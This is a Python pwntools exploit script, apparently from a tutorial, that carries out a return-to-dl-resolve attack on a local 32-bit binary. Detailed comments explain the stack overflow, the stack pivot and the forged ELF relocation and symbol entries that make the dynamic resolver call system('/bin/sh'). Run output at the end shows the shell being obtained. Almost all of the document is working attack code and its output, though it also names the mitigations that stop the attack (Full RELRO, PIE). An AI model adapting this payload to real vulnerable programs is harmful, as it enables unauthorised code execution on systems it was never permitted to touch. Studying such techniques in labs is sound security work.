Rop.py
"""Return-to-dl-resolve exploit against the local ``./rop`` binary (i386).

Stage 1 (``buf1``) overflows a stack buffer, calls ``read()`` to copy stage 2
into a writable area above ``.bss``, then pivots the stack to it.  Stage 2
(``buf2``) returns into PLT0 with a forged relocation offset, so that
``_dl_runtime_resolve`` walks forged ``Elf32_Rel``/``Elf32_Sym`` entries that
live inside the payload, resolves the symbol name found there and calls it
with a payload-supplied argument.

Preconditions visible in the run output below: Partial RELRO (lazy PLT
binding still active), NX enabled, no PIE (every address below is fixed).
Linking with Full RELRO (``-z relro -z now``) binds all imports at load time
and makes the GOT read-only, so the lazy-resolution path this relies on no
longer exists; PIE would invalidate every hard-coded address.
Written for Python-2-era pwntools: ``str`` and ``bytes`` are concatenated
freely (``p32()`` returns ``bytes`` on Python 3, where ``'A' * 62 + p32(...)``
raises ``TypeError``).
"""
from pwn import *
from struct import *   # unused here; note it shadows pwntools' own pack()/unpack()
  
#context.log_level = 'debug'
elf = ELF('./rop')   # target binary; every address below is read from, or fixed for, this build
 
# get section address
# .dynsym / .dynstr / .rel.plt are the tables the lazy resolver indexes; each
# forged structure further down is expressed as an offset from one of them.
addr_dynsym 	= elf.get_section_by_name('.dynsym').header['sh_addr']
addr_dynstr 	= elf.get_section_by_name('.dynstr').header['sh_addr']
addr_relplt 	= elf.get_section_by_name('.rel.plt').header['sh_addr']
addr_plt    	= elf.get_section_by_name('.plt').header['sh_addr']   # PLT0: pushes link_map, jumps to _dl_runtime_resolve
addr_bss    	= elf.get_section_by_name('.bss').header['sh_addr']
addr_plt_read   = elf.plt['read']
addr_got_read   = elf.got['read']   # GOT slot handed to the resolver as r_offset

log.info('Section Headers')
log.info('.dynsym  : ' + hex(addr_dynsym))
log.info('.dynstr  : ' + hex(addr_dynstr))
log.info('.rel.plt : ' + hex(addr_relplt))
log.info('.plt     : ' + hex(addr_plt))
log.info('.bss     : ' + hex(addr_bss))
log.info('read@plt : ' + hex(addr_plt_read))
log.info('read@got : ' + hex(addr_got_read))
 
# Gadget addresses hard-coded for this build of ./rop (no PIE, see run output);
# named after the instruction sequence they are expected to point at
# (pop;pop;pop;ret / pop ebp;ret / leave;ret -- TODO confirm against the
# disassembly).  They must be re-located for any other binary.
addr_pop3 = 0x080484e9
addr_pop_ebp = 0x080484eb
addr_leave_ret = 0x080483a8

# Stage 2 is read into a writable region 0x300 bytes past the start of .bss
# and the stack is pivoted there; 0x300 is presumably just a gap past the
# program's own .bss variables -- verify for other binaries.
stack_size = 0x300
base_stage = addr_bss + stack_size

#read(0,base_stage,100)
#jmp base_stage
# 62 bytes of filler up to the saved return address (offset specific to this
# binary), then:
#   read@plt(0, base_stage, 100) -> copies stage 2 (59 bytes, fits in 100) to base_stage
#   pop3 gadget                  -> discards the three read() arguments
#   pop ebp = base_stage; leave; ret
#     leave = mov esp, ebp; pop ebp -> esp ends up at base_stage + 4
#     ret   -> transfers to the dword at base_stage + 4 (addr_plt in buf2)
buf1 = 'A'* 62
buf1 += p32(addr_plt_read)
buf1 += p32(addr_pop3)
buf1 += p32(0)            # fd = stdin
buf1 += p32(base_stage)   # destination
buf1 += p32(100)          # length
buf1 += p32(addr_pop_ebp)
buf1 += p32(base_stage)
buf1 += p32(addr_leave_ret)
 
# Offsets of the forged structures inside buf2 once it sits at base_stage:
#   +0  'AAAA' (eaten by the pop ebp in leave)   +4  addr_plt
#   +8  fake_reloc_offset                        +12 'BBBB' (return address)
#   +16 argument (addr_fake_cmd)
#   +20 Elf32_Rel (8 bytes)   +28 Elf32_Sym (16 bytes)
#   +44 "system\0" (7 bytes)  +51 "/bin/sh\0"
addr_fake_reloc  = base_stage + 20
addr_fake_sym 	 = addr_fake_reloc + 8
addr_fake_symstr = addr_fake_sym +16
addr_fake_cmd 	 = addr_fake_symstr +7
 
# The resolver reads the Elf32_Rel at .rel.plt + reloc_arg, the Elf32_Sym at
# .dynsym + ELF32_R_SYM(r_info) * sizeof(Elf32_Sym) and the name at
# .dynstr + st_name, so every forged field is relative to the real table.
fake_reloc_offset = addr_fake_reloc - addr_relplt
# r_info = (symbol index << 8) | type.  (dist * 16) & ~0xFF equals
# (dist // 16) << 8 only when dist is a multiple of 16 (sizeof Elf32_Sym);
# nothing checks that here, so an unaligned base_stage silently produces a
# wrong symbol index.
fake_r_info 	  = ((addr_fake_sym - addr_dynsym) * 16) & ~0xFF 	#FAKE ELF32_R_SYM (symbol index in the upper 24 bits)
fake_r_info	  = fake_r_info | 0x7									#FAKE ELF32_R_TYPE: 7 = R_386_JMP_SLOT
fake_st_name 	  = addr_fake_symstr - addr_dynstr

log.info('') 
log.info('Fake Struct Information')
log.info('fake_reloc_offset : ' + hex(fake_reloc_offset))
log.info('addr_fake_cmd   : ' + hex(addr_fake_cmd))
log.info('addr_got_read   : ' + hex(addr_got_read))
log.info('fake_r_info   : ' + hex(fake_r_info))
log.info('fake_st_name   : ' + hex(fake_st_name))

#_dl_runtime_resolve(struct link_map *l, fake_reloc_arg)
# Stage 2, laid out as documented at the addr_fake_* definitions above.
buf2 = 'AAAA'                   # popped into ebp by `leave`; never used
buf2 += p32(addr_plt)           # PLT0 -> _dl_runtime_resolve(link_map, reloc_arg)
buf2 += p32(fake_reloc_offset)  # reloc_arg
buf2 += 'BBBB'                  # return address for the resolved function
#Argument of the function
buf2 += p32(addr_fake_cmd)
#Fake Elf32_Rel
buf2 += p32(addr_got_read)   # r_offset: slot the resolver writes the result to
buf2 += p32(fake_r_info)     # r_info: symbol index | R_386_JMP_SLOT
#Fake Elf32_Sym
buf2 += p32(fake_st_name)    # st_name: offset of "system" relative to .dynstr
buf2 += p32(0)               # st_value
buf2 += p32(0)               # st_size
buf2 += p32(0x12)            # st_info = STB_GLOBAL << 4 | STT_FUNC; st_other = 0; st_shndx = 0
#String "system"
buf2 += 'system\x00'
#String "/bin/sh"
buf2 += '/bin/sh\x00'
 
binary = ELF(elf.path)   # re-parses the same file; `elf` could be reused directly
p = process(binary.path)
p.recvn(10)              # consume the program's initial 10 bytes of output (presumably a prompt -- verify against the binary)
p.send(buf1)             # stage 1: overflow + read() + pivot
p.send(buf2)             # stage 2: consumed by the read() issued in stage 1
p.interactive()
lazenca0x0@ubuntu:~/Exploit/dl_resolve$ python exploit.py 
[!] Pwntools does not support 32-bit Python.  Use a 64-bit release.
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/lazenca0x0/.pwntools-cache/update to 'never'.
[*] You have the latest version of Pwntools (3.12.2)
[*] '/home/lazenca0x0/Exploit/dl_resolve/rop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] Section Headers
[*] .dynsym  : 0x80481cc
[*] .dynstr  : 0x804822c
[*] .rel.plt : 0x80482b0
[*] .plt     : 0x80482f0
[*] .bss     : 0x804a020
[*] read@plt : 0x8048300
[*] read@got : 0x804a00c
[*] 
[*] Fake Struct Information
[*] fake_reloc_offset : 0x2084
[*] addr_fake_cmd   : 0x804a353
[*] addr_got_read   : 0x804a00c
[*] fake_r_info   : 0x21707
[*] fake_st_name   : 0x2120
[+] Starting local process '/home/lazenca0x0/Exploit/dl_resolve/rop': pid 12887
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

References
